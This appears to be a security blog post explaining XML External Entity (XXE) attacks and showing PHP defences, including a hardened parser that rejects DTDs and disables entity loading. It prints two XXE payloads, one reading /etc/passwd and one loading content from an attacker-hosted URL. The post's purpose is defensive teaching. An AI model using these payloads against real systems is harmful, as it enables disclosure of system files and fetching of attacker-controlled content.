March 3, 2017
XML External Entity (XXE) prevention
An XML External Entity (XXE) attack is a very serious type of attack which can have a huge impact on the security of an entire system [1]. Yet it is not widely known.
How does it work?
A lot of applications use XML as a data format to exchange data between two systems. This is common practice, especially in the business world. What an attacker does is inject malicious XML that requests an external entity. This can lead to information disclosure (yes, even passwords), remote code execution or denial of service [1]. The external entity is fetched as soon as the XML parser parses the input.
Information disclosure
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ELEMENT id ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<id>&xxe;</id>
This example declares an external entity that loads the contents of /etc/passwd; the file contents are then expanded inside <id>.
RCE
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ELEMENT id ANY >
<!ENTITY xxe SYSTEM "http://mydomain.com/xxe/code.txt">
]>
<id>&xxe;</id>
Here a file hosted by the attacker is loaded into the XML; it could contain anything you can imagine.
“But the data is transmitted over TLS”
When using TLS, the body of your request is encrypted, so an attacker does not know whether you are using XML and does not know the specification of your interface. BUT in a mobile app, for example, if you don't use certificate pinning, an attacker can easily analyse all requests made to your server with a MITM proxy and would then know that you are exchanging data as XML.
Solutions
PHP [2]:
// prevent XXE in XMLReader, SimpleXML, DOM
// (deprecated since PHP 8.0, where libxml >= 2.9 disables external entity loading by default)
libxml_disable_entity_loader(true);
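As an added example (not code from the post), the same libxml_disable_entity_loader() call wrapped in a small parser that additionally rejects any DOCTYPE declaration and turns off entity substitution in DOMDocument. The inputs fed to it are the two payloads from the sections above plus one harmless document, all constructed inline.

```php
<?php
// Hardened wrapper for parsing XML that comes from an untrusted client.
function parseUntrustedXml(string $xml): DOMDocument
{
    // Cheap early reject: entity declarations can only appear inside a DOCTYPE,
    // and untrusted input has no legitimate reason to carry one.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        throw new InvalidArgumentException('DOCTYPE/DTD is not allowed in untrusted XML');
    }
    // On PHP < 8.0 switch the external entity loader off explicitly. The call is
    // deprecated from PHP 8.0, where libxml >= 2.9 keeps it disabled by default.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->resolveExternals   = false;
    $doc->substituteEntities = false;
    // Never pass LIBXML_NOENT or LIBXML_DTDLOAD; LIBXML_NONET also blocks any
    // network fetch libxml might attempt while parsing.
    if ($doc->loadXML($xml, LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING) === false) {
        throw new InvalidArgumentException('Malformed XML');
    }
    return $doc;
}

// Constructed inputs: the two payloads from the post and a harmless document
// that the endpoint is supposed to accept.
$dtd = '<!DOCTYPE root [ <!ELEMENT id ANY > <!ENTITY xxe SYSTEM "%s"> ]>';
$samples = [
    'file disclosure' => '<?xml version="1.0" encoding="ISO-8859-1"?>'
        . sprintf($dtd, 'file:///etc/passwd') . '<id>&xxe;</id>',
    'remote fetch'    => '<?xml version="1.0" encoding="ISO-8859-1"?>'
        . sprintf($dtd, 'http://mydomain.com/xxe/code.txt') . '<id>&xxe;</id>',
    'benign'          => '<?xml version="1.0"?><id>42</id>',
];

foreach ($samples as $name => $xml) {
    try {
        $doc = parseUntrustedXml($xml);
        printf("%-15s accepted, <id> = %s\n", $name, $doc->documentElement->textContent);
    } catch (InvalidArgumentException $e) {
        printf("%-15s rejected: %s\n", $name, $e->getMessage());
    }
}
```

The DOCTYPE check operates on the raw bytes, so the libxml flags remain the actual control; the early reject only saves the parser from touching a DTD at all.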
As always: never trust the client and always validate incoming data!
Sources:
[1] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP
Tags: php, security, xxe
About the author
human, software engineer, tech enthusiast, security researcher
E-Mail: blog@cipher.digital